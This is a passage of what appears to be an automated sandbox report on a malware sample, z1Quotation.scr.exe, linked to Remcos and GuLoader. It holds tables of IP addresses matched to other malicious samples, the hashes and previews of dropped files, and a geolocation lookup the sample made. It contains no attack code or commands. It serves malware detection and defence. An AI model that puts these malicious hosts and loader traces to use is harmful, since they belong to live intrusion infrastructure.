                                                                            Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                            • 178.237.33.50
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            LEASEWEB-USA-SFO-12UShttp://umjkitjtsk.top/crp/325gewfkj345Get hashmaliciousUnknownBrowse
                                                                            • 209.58.134.240
                                                                            BAT6357377.exeGet hashmaliciousFormBookBrowse
                                                                            • 147.255.16.249
                                                                            SecuriteInfo.com.Linux.Siggen.9999.19003.7982.elfGet hashmaliciousMiraiBrowse
                                                                            • 23.82.95.146
                                                                            mipsGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                            • 23.83.167.235
                                                                            Quotation.exeGet hashmaliciousFormBookBrowse
                                                                            • 147.255.16.249
                                                                            https://fwealthm.comGet hashmaliciousUnknownBrowse
                                                                            • 23.82.31.224
                                                                            94.156.8.9-skid.ppc-2024-07-23T17_40_07.elfGet hashmaliciousMirai, MoobotBrowse
                                                                            • 23.82.95.149
                                                                            yIRn1ZmsQF.elfGet hashmaliciousUnknownBrowse
                                                                            • 23.83.167.231
                                                                            Absa Eft.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                            • 23.106.53.146
                                                                            http://lovelycarrot.comGet hashmaliciousUnknownBrowse
                                                                            • 209.58.133.18
                                                                            Web-Africa-Networks-ASZAX8VbtniLpf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                            • 102.65.21.26
                                                                            m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                                            • 102.65.164.138
                                                                            x86.elfGet hashmaliciousUnknownBrowse
                                                                            • 102.65.186.72
                                                                            Uw0VH7yLVB.elfGet hashmaliciousMiraiBrowse
                                                                            • 102.65.222.253
                                                                            rSignedApprovedQuotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                            • 102.65.21.26
                                                                            http://packages.mpinsureit.com/Get hashmaliciousUnknownBrowse
                                                                            • 102.65.21.13
                                                                            jew.arm.elfGet hashmaliciousUnknownBrowse
                                                                            • 102.65.73.255
                                                                            https://www.packages.mpinsureit.com/Get hashmaliciousUnknownBrowse
                                                                            • 102.65.21.13
                                                                            N2lCCQIbyW.elfGet hashmaliciousMiraiBrowse
                                                                            • 102.65.252.110
                                                                            4xGw66BS5c.elfGet hashmaliciousMiraiBrowse
                                                                            • 102.65.0.111
                                                                            ATOM86-ASATOM86NLV1ljXRn7Yo.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            Invoice and packing list (021)_pdf.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            PO 11001 .xlsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                            • 178.237.33.50
                                                                            ZIXBhdgf6y.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            yVhGfho0R4.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            C6DAEyTs7d.rtfGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.26006.17204.rtfGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            dvswiftsend_240917122612_9331095243.docx.docGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            oi2BC6zhUY.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                            • 178.237.33.50
Match | Associated Sample Name / URL | Detection | Threat Name | Context
37f463bf4616ecd445d4a1937da06e19 | 1727684587d91a3fc4a77823bfb5c4c41b9d6c0bff84ae126bd19290c7e03bed994fdb4477364.dat-decoded.exe | malicious | CryptOne, Snake Keylogger, VIP Keylogger | 102.65.21.26
37f463bf4616ecd445d4a1937da06e19 | Gelato Italiano_74695.exe.exe | malicious | Unknown | 102.65.21.26
37f463bf4616ecd445d4a1937da06e19 | Gelato Italiano_74695.exe.exe | malicious | Unknown | 102.65.21.26
37f463bf4616ecd445d4a1937da06e19 | Bnnebgers.vbs | malicious | GuLoader, Lokibot | 102.65.21.26
37f463bf4616ecd445d4a1937da06e19 | NTS_eTaxInvoice.html.vbs | malicious | Remcos, GuLoader | 102.65.21.26
37f463bf4616ecd445d4a1937da06e19 | Faktura_82666410_1361590461#U00b7pdf.vbe | malicious | Remcos, GuLoader | 102.65.21.26
37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | LummaC, Stealc, Vidar | 102.65.21.26
37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | LummaC, Stealc, Vidar | 102.65.21.26
37f463bf4616ecd445d4a1937da06e19 | SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | malicious | AsyncRAT, DcRat | 102.65.21.26
37f463bf4616ecd445d4a1937da06e19 | SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe | malicious | AsyncRAT, DcRat | 102.65.21.26
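Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Users\user\AppData\Local\Temp\nsi8284.tmp\nsExec.dll | SOuJyjzbcV.exe | malicious | GuLoader
C:\Users\user\AppData\Local\Temp\nsi8284.tmp\nsExec.dll | goCj2yHUGx.exe | malicious | GuLoader
C:\Users\user\AppData\Local\Temp\nsi8284.tmp\nsExec.dll | FcMubiUTN1.exe | malicious | GuLoader
C:\Users\user\AppData\Local\Temp\nsi8284.tmp\nsExec.dll | oEijqRFE2K.exe | malicious | GuLoader
C:\Users\user\AppData\Local\Temp\nsi8284.tmp\nsExec.dll | SOuJyjzbcV.exe | malicious | GuLoader
C:\Users\user\AppData\Local\Temp\nsi8284.tmp\nsExec.dll | goCj2yHUGx.exe | malicious | GuLoader
C:\Users\user\AppData\Local\Temp\nsi8284.tmp\nsExec.dll | FcMubiUTN1.exe | malicious | GuLoader
C:\Users\user\AppData\Local\Temp\nsi8284.tmp\nsExec.dll | LM1UOHhZYE.exe | malicious | GuLoader
C:\Users\user\AppData\Local\Temp\nsi8284.tmp\nsExec.dll | LM1UOHhZYE.exe | malicious | GuLoader
C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll | Teosofis.exe | malicious | GuLoader
C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll | Appetisement56.exe | malicious | GuLoader
C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll | Sparkler.exe | malicious | GuLoader
C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll | Revived.exe | malicious | GuLoader
C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll | Graphitoid.exe | malicious | GuLoader
C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll | Teosofis.exe | malicious | GuLoader
C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll | Sparkler.exe | malicious | GuLoader
C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll | Appetisement56.exe | malicious | GuLoader
C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll | Revived.exe | malicious | GuLoader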
                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):65536
                                                                                                                Entropy (8bit):1.1695842075093994
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:re/rqlnmBUWgj4mlr72jidDu76qfAIO8Kc:q/rqlmBUWgjgGDu76qfAIO8K
                                                                                                                MD5:CE79F6C5972F1565F7D195D9A9094545
                                                                                                                SHA1:D8430EDC267C3EF53A03921CCBB67DC9E54FEBE7
                                                                                                                SHA-256:F575E8C26BBC33D307515EC8F861829AA8A3B0F70325A243C3D49A279004C9EF
                                                                                                                SHA-512:287EF9C16FA7A0C9D183BCC232A88100130CA591DBB554D368B5040D3D37079BCF9A45A6DEDF4A37BD909F7328D76A7346BF91F66F6989863FF48F4EA23A53CB
                                                                                                                Malicious:false
                                                                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.1.6.4.5.6.0.6.8.2.5.9.6.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.1.6.4.5.6.1.0.8.8.7.6.2.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.e.5.6.7.9.9.9.-.a.e.e.d.-.4.1.e.3.-.8.3.e.4.-.b.4.6.0.4.f.b.f.4.9.0.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.2.6.7.7.7.a.8.-.3.4.2.7.-.4.b.f.6.-.9.2.e.8.-.9.a.3.e.b.9.7.e.5.c.1.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.z.1.Q.u.o.t.a.t.i.o.n...s.c.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.8.4.-.0.0.0.1.-.0.0.4.9.-.0.8.6.2.-.6.e.f.1.1.f.1.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.4.6.9.3.d.9.3.8.2.9.e.4.c.e.0.0.9.f.e.7.5.3.2.7.8.d.d.a.9.f.0.0.0.0.0.0.9.0.4.!.0.0.0.0.4.9.a.3.4.b.4.9.6.d.7.8.0.5.4.a.1.b.6.4.0.4.d.d.0.4.d.9.b.e.6.0.d.0.7.1.a.e.5.2.!.z.1.Q.u.o.t.a.t.i.o.n...s.c.r...e.x.e...
                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                File Type:Mini DuMP crash report, 14 streams, Mon Sep 30 10:09:20 2024, 0x1205a4 type
                                                                                                                Category:dropped
                                                                                                                Size (bytes):151696
                                                                                                                Entropy (8bit):2.0714496483403995
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:768:t69l+KepY5qcnvEe0T2HZyUhZvmfb1C/yJv:tkf5nvRHZyUhRmT1C/yJv
                                                                                                                MD5:71F34277AA879BD83574090FF3E16C5D
                                                                                                                SHA1:9CB88D25CF92553E263564439F5E1E9AE4839F5D
                                                                                                                SHA-256:A791DA6AA998DFBE5D9DEA6877C84B0D3A8D4100377A130A32F6EBF9A36DF5E1
                                                                                                                SHA-512:68056036CC4B931125D8736B30035CFBF586CDF08676F64195AE2ED2B6F9E726583FBE1F97069986B19AC5F7A9055EC30A62F6340B21406CADC1FA00A98FAA3F
                                                                                                                Malicious:false
                                                                                                                Preview:MDMP..a..... ........x.f........................X!...............f..........T.......8...........T............[..............d+..........P-..............................................................................bJ.......-......GenuineIntel...........T...........Yw.f#............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):6370
                                                                                                                Entropy (8bit):3.716858816202162
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:R7IU6o7lZt3i6v6IsQwhY7ZLOvzcuujulypaM4Uf89b2fsfrym:R9l7lZNi6v6IsJY7CEprf89b2fsfrym
                                                                                                                MD5:E22BAD4D18646448E4BD849AEE330024
                                                                                                                SHA1:D7339C352F1020BA8A344B68EEE97312118CBC4C
                                                                                                                SHA-256:225C4B563626BF00B21532E005B237AEE057596816BD3E0C4740118F355B4D39
                                                                                                                SHA-512:B57FC3400B59D9D941326A6770CA2A02518D3ADB2FACEF2DA0A954B80DD1AF2A4013815E473BE55CD74BA9A978DFC63129C43CD8EC266740AE05299219025067
                                                                                                                Malicious:false
                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.2.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...1.1.6.5...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.6.5.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.4.1.2.<./.P.i.
                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):4764
                                                                                                                Entropy (8bit):4.500211913842631
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:cvIwwtl8zsZe702I7VFJ5WS2Cfjkws3rm8M4JIss5FI+q8sPFc/XuavI7ld:uILfA7GySPfaJryuaQ7ld
                                                                                                                MD5:8A387A9177548592C598AD2727FC52EE
                                                                                                                SHA1:96511B3A863FE8425E2E99A7712F6EDF77C8C02B
                                                                                                                SHA-256:C57F9961E2237AD71ABCF6D8F39A865CB2CFA54938DE8B80AD16BC70CC546D38
                                                                                                                SHA-512:4F70C31EE758ECEC3B03E3DC6C306D5278720118FC4A7C140F8A947799413391D26EA496B8BB996C68F3C3F86BC48E88466BCC8966BA127C6EEFD267B94F8F52
                                                                                                                Malicious:false
                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19042" />.. <arg nm="vercsdbld" val="1165" />.. <arg nm="verqfe" val="1165" />.. <arg nm="csdbld" val="1165" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="242" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="222866600" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="
                                                                                                                Process:C:\Windows\SysWOW64\dxdiag.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):26
                                                                                                                Entropy (8bit):3.873140679513132
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:tAvnXVG8d:tgXVVd
                                                                                                                MD5:2DE2373EF07261CAC4D4BF7D3FE31122
                                                                                                                SHA1:8A5BD414AFD96AFAED4EB413D033240BC6A71C94
                                                                                                                SHA-256:F6F219ED2C4029EBC3071C036B64113AA62A7A342D2FD5965FD122D5C90BC9BC
                                                                                                                SHA-512:AF4CACDD0A501DCB37318FA9E5B7049AFEB8E0EE6EB0770F0B013C70E32123FA45C1508DD12921C909C0C9F88AC8A2F3041A16747E5FF145B4FB15E8509DB105
                                                                                                                Malicious:false
                                                                                                                Preview:INSC.>.....Mar222021150038
                                                                                                                Process:C:\Windows\SysWOW64\dxdiag.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):26
                                                                                                                Entropy (8bit):3.873140679513132
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:tAvnXVG8d:tgXVVd
                                                                                                                MD5:2DE2373EF07261CAC4D4BF7D3FE31122
                                                                                                                SHA1:8A5BD414AFD96AFAED4EB413D033240BC6A71C94
                                                                                                                SHA-256:F6F219ED2C4029EBC3071C036B64113AA62A7A342D2FD5965FD122D5C90BC9BC
                                                                                                                SHA-512:AF4CACDD0A501DCB37318FA9E5B7049AFEB8E0EE6EB0770F0B013C70E32123FA45C1508DD12921C909C0C9F88AC8A2F3041A16747E5FF145B4FB15E8509DB105
                                                                                                                Malicious:false
                                                                                                                Preview:INSC.>.....Mar222021150038
                                                                                                                Process:C:\Windows\SysWOW64\dxdiag.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):65552
                                                                                                                Entropy (8bit):0.02052824266090763
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:n9llGlll/l/lXp9ZjrPBYf8Pc1yllzSlld+k5l+jLtdll:n9l0dPBYf8PD5S/d+k5l+H
                                                                                                                MD5:EEAD976AD287EEB54A4C3D5265AAB5DF
                                                                                                                SHA1:0EB6B00B9E9C61EFB0AB8F09CED725EFD2828F14
                                                                                                                SHA-256:9F05FF8A8E6BCC728ABBF15D5C2923E5202720054C054FAD44CB1F65FD074B2C
                                                                                                                SHA-512:C0EC55E85389AA8443D1E977E44DAC51F83D20F33524935D47520AD685AD0EFC552B5F536B22060D62AB7B5E8B0DC67BABF3DF55214A32AAED7240651803B6FB
                                                                                                                Malicious:false
                                                                                                                Process:C:\Windows\SysWOW64\dxdiag.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):4
                                                                                                                Entropy (8bit):1.5
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:R:R
                                                                                                                MD5:F49655F856ACB8884CC0ACE29216F511
                                                                                                                SHA1:CB0F1F87EC0455EC349AAA950C600475AC7B7B6B
                                                                                                                SHA-256:7852FCE59C67DDF1D6B8B997EAA1ADFAC004A9F3A91C37295DE9223674011FBA
                                                                                                                SHA-512:599E93D25B174524495ED29653052B3590133096404873318F05FD68F4C9A5C9A3B30574551141FBB73D7329D6BE342699A17F3AE84554BAB784776DFDA2D5F8
                                                                                                                Malicious:false
                                                                                                                Preview:EERF
                                                                                                                Process:C:\Windows\SysWOW64\dxdiag.exe
                                                                                                                File Type:Matlab v4 mat-file (little endian) (, numeric, rows 0, columns 16, imaginary
                                                                                                                Category:dropped
                                                                                                                Size (bytes):65536
                                                                                                                Entropy (8bit):0.06375376003383355
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:VS+UN+G28ntY7J7BfS/lBZXUGlaVPDFcChs:E+s+GEB0BZXUG+l
                                                                                                                MD5:28B017A8A053F5497D60F0385437892A
                                                                                                                SHA1:458B75C59381B2C5663F67F0503DE7E72C164528
                                                                                                                SHA-256:8BF8273CBF916B43E0B0954242D1CDB618FE6A2B906D6FF7E7817B01607A308B
                                                                                                                SHA-512:4EDBDEF2C1D17EBD92C450073042931CBFD4C54C97CAE5D191D71E9CE1827A3B40CE6E8CBBF4766914E8B403489A803E638EA7270B8130B8989F588B55D68863
                                                                                                                Malicious:false
                                                                                                                Preview:................>...(....x:no.&A.e.u~+..C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.d.x.d.i.a.g...e.x.e.................................(...p.DJ!.IL.....Z...,.%...................>..I....>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...$.jz... ........................
                                                                                                                Process:C:\Windows\SysWOW64\dxdiag.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):65552
                                                                                                                Entropy (8bit):0.01237149505889543
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:N+/lGlll/l/lXp9ZjrPBY06llcllXwiEl/lRP:m0dPBY0O6/giEXJ
                                                                                                                MD5:27754E2DB48BC95315A62B86FD981E5A
                                                                                                                SHA1:1568ECDB144BE9F8DBC488BC4944D89E31058EA5
                                                                                                                SHA-256:84560889FB3E1F4E9F6302D1A73D62C85E0F7544DCC1255328B8643A0BFCCA09
                                                                                                                SHA-512:FC8BF7FE7489942015F32F2D93DE1B3F3A07E08AAEBC872E89E5C9C20A21449D9BB7E4576695C6C81411BDABD9A96F658F6CD4A1CC502D7045B9DB8568C422F1
                                                                                                                Malicious:false
                                                                                                                Process:C:\Windows\SysWOW64\dxdiag.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):4
                                                                                                                Entropy (8bit):1.5
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:R:R
                                                                                                                MD5:F49655F856ACB8884CC0ACE29216F511
                                                                                                                SHA1:CB0F1F87EC0455EC349AAA950C600475AC7B7B6B
                                                                                                                SHA-256:7852FCE59C67DDF1D6B8B997EAA1ADFAC004A9F3A91C37295DE9223674011FBA
                                                                                                                SHA-512:599E93D25B174524495ED29653052B3590133096404873318F05FD68F4C9A5C9A3B30574551141FBB73D7329D6BE342699A17F3AE84554BAB784776DFDA2D5F8
                                                                                                                Malicious:false
                                                                                                                Preview:EERF
                                                                                                                Process:C:\Windows\SysWOW64\dxdiag.exe
                                                                                                                File Type:Matlab v4 mat-file (little endian) (, numeric, rows 0, columns 16, imaginary
                                                                                                                Category:dropped
                                                                                                                Size (bytes):65536
                                                                                                                Entropy (8bit):0.020296169267305913
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:9llpl5d2DJqojBdl+Sli5l2GkNl0lR9TNlktt/llaia9sVQMm4qNw:c9q0Bn+SkyGkNlUetb2Hsqi
                                                                                                                MD5:AE2B45690B7A2B278AD387D9AB374E16
                                                                                                                SHA1:1822D3444AF5A00E882B9D1483CCE518FF57FD09
                                                                                                                SHA-256:F617DFE9D4C2FE77DC462523FF803A1C7D9E23E014D63F64D2202DFC519BFEE7
                                                                                                                SHA-512:36D490650F9FB4280A83B9869F54C8C4B2AA317652397726107B44AF344E377118A6306DE71BC2D4DE012CDDD8E8A7C157F6164D619F315D264841E36137A01D
                                                                                                                Malicious:false
                                                                                                                Preview:................>...(....x:no.&A.e.u~+..C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.d.x.d.i.a.g...e.x.e.................................(...p.DJ!.IL.....Z.F.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                File Type:JSON data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):961
                                                                                                                Entropy (8bit):5.012221362906051
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:tkE9nd6CsGkMyGWKyGXPVGArwY3TogmayHnmGcArpv/mOAaNO+ao9W7iN5zzkw7+:qCdRNuKyGX85JvXhNlT3/7SxDWro
                                                                                                                MD5:EA373E330F778B107A9B569572AF73AA
                                                                                                                SHA1:E421663E5B49D72359FF2679546DE6C706198B5D
                                                                                                                SHA-256:B1C86516741332A761D2B4FBF2886F436F1F4AB983BCC2C92079731DCF5104F1
                                                                                                                SHA-512:D433FDD154DBC467A0BBEF532F1020694EB6DC38A0020F751D4630DC8A24D39578ED13CA7B035BCC06B52BA85E347580A2776616C396E360C238445F06EF9AE6
                                                                                                                Malicious:false
                                                                                                                Preview:{. "geoplugin_request":"102.129.152.223",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Miami",. "geoplugin_region":"Florida",. "geoplugin_regionCode":"FL",. "geoplugin_regionName":"Florida",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"528",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"25.7689",. "geoplugin_longitude":"-80.1946",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                                                Process:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2
                                                                                                                Entropy (8bit):1.0
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Qn:Qn
                                                                                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                Malicious:false
                                                                                                                Preview:..
                                                                                                                Process:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x96dfe6b7, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                Category:dropped
                                                                                                                Size (bytes):41943040
                                                                                                                Entropy (8bit):1.4150609084792243
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24576:y4z7C4CtPp9MkGMdlGyfAmVnPDQgGE7g9jokoiGsH718Cu2b0lfoBg:1Cr9ldlGyfnPDQgG5bu2
                                                                                                                MD5:E63B481E126C85F7B9C1F070D926D382
                                                                                                                SHA1:4D5066533A3F3BDE751C918E6E790BD7DC03DBEB
                                                                                                                SHA-256:BB24253D09050476EED970A954EC087165E07027D75EDB3F0E903B83305A2B60
                                                                                                                SHA-512:41D88CC5E7E7C293771A2179B74E62543F5A23E61B2C71AFCEBBABD00D69D43CE5C9B9636E1C0525E1DDC41B5BFE17BEA9B88397CFC2199E70595105B84C3B8D
                                                                                                                Malicious:false
                                                                                                                Process:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x96dfe6b7, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                Category:dropped
                                                                                                                Size (bytes):41943040
                                                                                                                Entropy (8bit):1.4150609084792243
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24576:y4z7C4CtPp9MkGMdlGyfAmVnPDQgGE7g9jokoiGsH718Cu2b0lfoBg:1Cr9ldlGyfnPDQgG5bu2
                                                                                                                MD5:E63B481E126C85F7B9C1F070D926D382
                                                                                                                SHA1:4D5066533A3F3BDE751C918E6E790BD7DC03DBEB
                                                                                                                SHA-256:BB24253D09050476EED970A954EC087165E07027D75EDB3F0E903B83305A2B60
                                                                                                                SHA-512:41D88CC5E7E7C293771A2179B74E62543F5A23E61B2C71AFCEBBABD00D69D43CE5C9B9636E1C0525E1DDC41B5BFE17BEA9B88397CFC2199E70595105B84C3B8D
                                                                                                                Malicious:false
                                                                                                                Process:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x96dfe6b7, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                Category:dropped
                                                                                                                Size (bytes):41943040
                                                                                                                Entropy (8bit):1.4150609084792243
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24576:y4z7C4CtPp9MkGMdlGyfAmVnPDQgGE7g9jokoiGsH718Cu2b0lfoBg:1Cr9ldlGyfnPDQgG5bu2
                                                                                                                MD5:E63B481E126C85F7B9C1F070D926D382
                                                                                                                SHA1:4D5066533A3F3BDE751C918E6E790BD7DC03DBEB
                                                                                                                SHA-256:BB24253D09050476EED970A954EC087165E07027D75EDB3F0E903B83305A2B60
                                                                                                                SHA-512:41D88CC5E7E7C293771A2179B74E62543F5A23E61B2C71AFCEBBABD00D69D43CE5C9B9636E1C0525E1DDC41B5BFE17BEA9B88397CFC2199E70595105B84C3B8D
                                                                                                                Malicious:false
                                                                                                                Process:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2
                                                                                                                Entropy (8bit):1.0
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:
                                                                                                                MD5:F3B25701FE362EC84616A93A45CE9998
